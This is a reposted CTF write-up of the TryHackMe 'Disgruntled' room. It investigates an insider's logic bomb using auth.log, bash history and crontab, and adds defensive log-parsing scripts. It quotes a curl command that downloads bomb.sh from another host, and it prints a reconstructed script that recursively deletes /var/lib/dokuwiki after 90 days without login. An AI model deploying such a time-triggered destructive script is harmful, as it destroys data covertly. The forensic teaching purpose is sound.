Disgruntled CTF

WriteUp 2 years ago (2023) admin

This CTF helped me learn how an IT person was planning a logic bomb attack.

You can access the room here: https://tryhackme.com/room/disgruntled

We need to check the logs of the IT person's laptop to see what exactly happened.

  1. The user installed a package on the machine using elevated privileges. According to the logs, what is the full COMMAND?

Answer: /usr/bin/apt install dokuwiki

To find these logs, go to /var/log and open the auth.log file with an editor of your choice.

There is an easier way to find the answer, which is to use the “grep” command: “grep -i install auth.log”.

The auth.log file records authentication events such as logins, PAM session activity and sudo invocations. System administrators and security analysts use it to monitor and troubleshoot authentication issues and to track unauthorized access attempts or security breaches.

2. What was the present working directory (PWD) when the previous command was run?

Answer: /home/cybert

The working directory is recorded on the same log lines that show the install command, in the PWD= field that sudo writes for every invocation.

  1. Which user was created after the package from the previous task was installed?

Answer: it-admin

We can again use grep to make our life easier: “grep -i adduser auth.log” finds the user that was added to the system.

2. A user was then later given sudo privileges. When was the sudoers file updated?

Answer: Dec 28 06:27:34

I had to skim through the logs since I didn't really know how you would give someone privileges or what the keyword for it is. So upon using the hint I found out I had to look for the keyword “visudo”, and then it was simple to use the grep command to find the answer.

3. A script file was opened using the “vi” text editor. What is the name of this file?

Answer: bomb.sh

To find this answer I again used the grep command, as the “keyword” was already given to us in the question.

As we can see, the only file that comes up is “bomb.sh”.
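The grep searches above all work because sudo logs every invocation to auth.log in one fixed shape, “user : TTY=… ; PWD=… ; USER=… ; COMMAND=…”. The script below is an added example (not part of the original writeup or the room) that parses that shape: it runs over a constructed auth.log excerpt whose sudo lines carry the values from the writeup, while the hostname, PIDs and the other timestamps are made up.

```shell
#!/bin/sh
# Constructed auth.log excerpt (not the room's real log file); the values in the sudo
# lines follow the writeup, the hostname, PIDs and the other timestamps are made up.
AUTH_LOG_SAMPLE='Dec 28 06:15:10 host sudo:   cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/usr/bin/apt install dokuwiki
Dec 28 06:15:11 host sudo: pam_unix(sudo:session): session opened for user root by cybert(uid=0)
Dec 28 06:20:05 host sudo:   cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/usr/sbin/adduser it-admin
Dec 28 06:20:06 host useradd[1402]: new user: name=it-admin, UID=1001, GID=1001, home=/home/it-admin, shell=/bin/bash
Dec 28 06:27:34 host sudo:   cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/usr/sbin/visudo
Dec 28 06:28:40 host sudo: it-admin : TTY=pts/1 ; PWD=/home/it-admin ; USER=root ; COMMAND=/usr/bin/vi bomb.sh'

# Every sudo invocation is logged as "user : TTY=... ; PWD=... ; USER=... ; COMMAND=...".
# Print "timestamp|user|PWD|COMMAND" for each sudo line whose COMMAND matches a keyword.
sudo_commands() {  # $1 = log text, $2 = case-insensitive keyword to grep for
    printf '%s\n' "$1" | grep -i "COMMAND=.*$2" |
        sed -E 's/^([A-Z][a-z]{2} +[0-9]+ [0-9:]+) [^ ]+ sudo: +([^ ]+) : .*PWD=([^ ]+) ; .*COMMAND=(.*)$/\1|\2|\3|\4/'
}

# Pick one field (1=timestamp, 2=user, 3=PWD, 4=COMMAND) from the matching line(s).
field() { sudo_commands "$1" "$2" | cut -d'|' -f"$3"; }

# The writeup's questions, answered from the sample log.
install_command() { field "$AUTH_LOG_SAMPLE" install 4; }                      # /usr/bin/apt install dokuwiki
install_pwd()     { field "$AUTH_LOG_SAMPLE" install 3; }                      # /home/cybert
added_user()      { field "$AUTH_LOG_SAMPLE" adduser 4 | awk '{print $NF}'; }  # it-admin
visudo_time()     { field "$AUTH_LOG_SAMPLE" visudo 1; }                       # Dec 28 06:27:34
vi_file()         { field "$AUTH_LOG_SAMPLE" '/vi ' 4 | awk '{print $NF}'; }   # bomb.sh

# Print all answers when the script is run directly.
for q in install_command install_pwd added_user visudo_time vi_file; do
    printf '%-16s %s\n' "$q:" "$("$q")"
done
```

Searching for “/vi ” rather than “vi” keeps visudo out of the match; against a real auth.log, replace the sample variable with “$(cat /var/log/auth.log)”.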

So now we know that the IT person has created a bomb.sh script to do some kind of harm to the system. Let's investigate how the user got that file and what it can do.

  1. What is the command used that created the file bomb.sh?

To find out how this file was created or where it came from, we need to go to the “it-admin” home directory and look at the commands that were run on the system.

Move back to the root directory, then into /home, and from there into the “it-admin” user's directory. Here we can open the .bash_history file to see what commands have been run.

The second command shows that the user shared the file through an SSH connection.

Answer: curl 10.10.158.38:8080/bomb.sh --output bomb.sh

2. The file was renamed and moved to a different directory. What is the full path of this file now?

To find this answer we need to visit the path that the user opened after removing the file, which is the next command in the history.

Path/Command: sudo nano /etc/crontab

crontab is a Unix utility that allows users to schedule and automate tasks to be executed at specific times or intervals.

When you open that file it shows which tasks are set to run automatically. On the left of the entry we see the schedule 0 8 * * *; the five fields are minute, hour, day of month, month and day of week, so this job runs at minute 0 of hour 8 every day, i.e. 08:00 AM. Cron reads these fields against the system's own 24-hour clock.

Answer: /bin/os-update.sh

3. When was the file from the previous question last modified? (Format: Month Day HH:MM)

Answer: Dec 28 06:29

To find the answer we can go to the directory where the file is stored: cd /bin

Then run ls -al to view the time the file was last modified.

4. What is the name of the file that will get created when the file from the first question executes?

In order to find the answer for this question we can use an editor to view the script: “nano os-update.sh”

At the end of the last line you can see the file name.

Answer: goodbye.txt

Now that we have the file, we know the user definitely wants to execute it, but when?

  1. At what time will the malicious file trigger? (Format: HH:MM AM/PM)

Answer: 08:00 AM

Remember that we found a time associated with this file in “/etc/crontab”; that is the time at which the user wants the file to be executed.
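Reading the trigger time off a system crontab entry is mechanical once you know the field layout, and the conversion from cron's 24-hour fields to the HH:MM AM/PM format the question asks for is where mistakes happen. The following is an added example, not code from the writeup or the room: it parses a constructed /etc/crontab excerpt (the os-update.sh line follows the writeup, the other lines are made up) and reports each job's trigger time, falling back to the raw fields when the schedule is not a fixed minute and hour.

```shell
#!/bin/sh
# Constructed /etc/crontab excerpt (not the room's file); only the os-update.sh job
# line follows the writeup, the rest is typical Debian-style filler.
CRONTAB_SAMPLE='SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
0 8 * * * root /bin/os-update.sh'

# Print "trigger|user|command" for every system-crontab job whose command contains $2.
# System crontab rows are: minute hour day-of-month month day-of-week user command...
# A fixed minute+hour is converted to HH:MM AM/PM; anything else (*, lists, steps)
# is reported as the raw five schedule fields.
cron_trigger() {  # $1 = crontab text, $2 = command substring to look for
    printf '%s\n' "$1" | awk -v want="$2" '
        /^[[:space:]]*(#|$)/ || /^[A-Za-z_]+=/ { next }    # comments, blanks, VAR=... lines
        {
            cmd = ""
            for (i = 7; i <= NF; i++) cmd = cmd (i > 7 ? " " : "") $i
            if (index(cmd, want) == 0) next
            if ($1 ~ /^[0-9]+$/ && $2 ~ /^[0-9]+$/) {
                h = $2 + 0
                ampm = (h < 12) ? "AM" : "PM"
                h12 = h % 12; if (h12 == 0) h12 = 12
                when = sprintf("%02d:%02d %s", h12, $1, ampm)
            } else {
                when = $1 " " $2 " " $3 " " $4 " " $5
            }
            print when "|" $6 "|" cmd
        }'
}

os_update_trigger() { cron_trigger "$CRONTAB_SAMPLE" os-update.sh | cut -d'|' -f1; }  # 08:00 AM
os_update_user()    { cron_trigger "$CRONTAB_SAMPLE" os-update.sh | cut -d'|' -f2; }  # root
os_update_command() { cron_trigger "$CRONTAB_SAMPLE" os-update.sh | cut -d'|' -f3; }  # /bin/os-update.sh
hourly_trigger()    { cron_trigger "$CRONTAB_SAMPLE" run-parts | cut -d'|' -f1; }     # 17 * * * *

cron_trigger "$CRONTAB_SAMPLE" os-update.sh
```

Note the user column: the job runs as root, so whatever /bin/os-update.sh does, it does with full privileges.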

What does the script do?

  1. The script runs the last command with the options -n 1 and -s "-90days", which lists the most recent login session of the user it-admin within the past 90 days. The output of this command is stored in the variable $OUTPUT.
  2. The script checks whether $OUTPUT is empty using an if statement. If $OUTPUT is empty (i.e., the user it-admin has not logged in during the past 90 days), the script proceeds to the next step.
  3. If $OUTPUT is empty, the script deletes the directory /var/lib/dokuwiki using the rm command with the option -r, which removes the directory recursively.
  4. The script then creates a new file called goodbye.txt in the root directory (/) containing the message “I TOLD YOU YOU'LL REGRET THIS!!! GOOD RIDDANCE!!! HAHAHAHA” and the signature “-mistermeist3r”. This is the logic bomb: the destructive payload only fires once the it-admin account has stopped logging in, and the message makes the author's intent clear.
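The four steps above are also the traits an analyst can look for when triaging other root-run cron scripts: an inactivity check built on last, a branch on that result, a recursive delete and a file dropped in /. The script below is an added example, not part of the writeup or the room; it scans a constructed script text that is reconstructed from the writeup's description of os-update.sh (only scanned as text, never executed) and prints the line number and indicator for each trait it finds.

```shell
#!/bin/sh
# Constructed script text, reconstructed from the writeup's description of
# os-update.sh (not the room's actual file). It is only scanned here, never run.
SCRIPT_SAMPLE='#!/bin/bash
OUTPUT=$(last -n 1 -s "-90days" it-admin)
if [ -z "$OUTPUT" ]; then
  rm -r /var/lib/dokuwiki
  echo "GOOD RIDDANCE" > /goodbye.txt
fi'

# Print "line<TAB>indicator" for each logic-bomb trait found in a script ($1 = script text).
# The traits are the ones the writeup walked through; the patterns are deliberately
# narrow so that a normal maintenance script produces few or no hits.
bomb_indicators() {
    printf '%s\n' "$1" | awk '
        /(^|[^A-Za-z_])last[[:space:]]+.*-s[[:space:]]+"?-[0-9]+days/ { hit("login-inactivity check via last -s") }
        /\[[[:space:]]+-z[[:space:]]+"?\$OUTPUT/                    { hit("branches on empty login history") }
        /(^|[[:space:]])rm[[:space:]]+-[a-zA-Z]*r/                   { hit("recursive delete") }
        />[[:space:]]*\/[A-Za-z0-9_.-]+[[:space:]]*$/                { hit("writes a file directly under /") }
        function hit(why) { print NR "\t" why }'
}

# Convenience wrappers answering the writeup's questions from the sample.
indicator_count() { bomb_indicators "$SCRIPT_SAMPLE" | wc -l | tr -d " "; }                      # 4
deleted_path()    { printf '%s\n' "$SCRIPT_SAMPLE" | sed -n 's/^[[:space:]]*rm -r[a-z]* //p'; }  # /var/lib/dokuwiki
dropped_file()    { printf '%s\n' "$SCRIPT_SAMPLE" | sed -n 's/.*> *\(\/[^ ]*\) *$/\1/p'; }      # /goodbye.txt

bomb_indicators "$SCRIPT_SAMPLE"
```

Run against a real crontab-launched script with “bomb_indicators "$(cat /bin/os-update.sh)"”; a script that trips all four patterns deserves the same line-by-line reading the writeup gives this one.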

Now we have finally completed this CTF!

Originally published by Divyank Patel: Disgruntled CTF

Copyright notice: posted by admin on April 1, 2023 at 8:40 PM.
When reposting, please credit: Disgruntled CTF | CTF导航
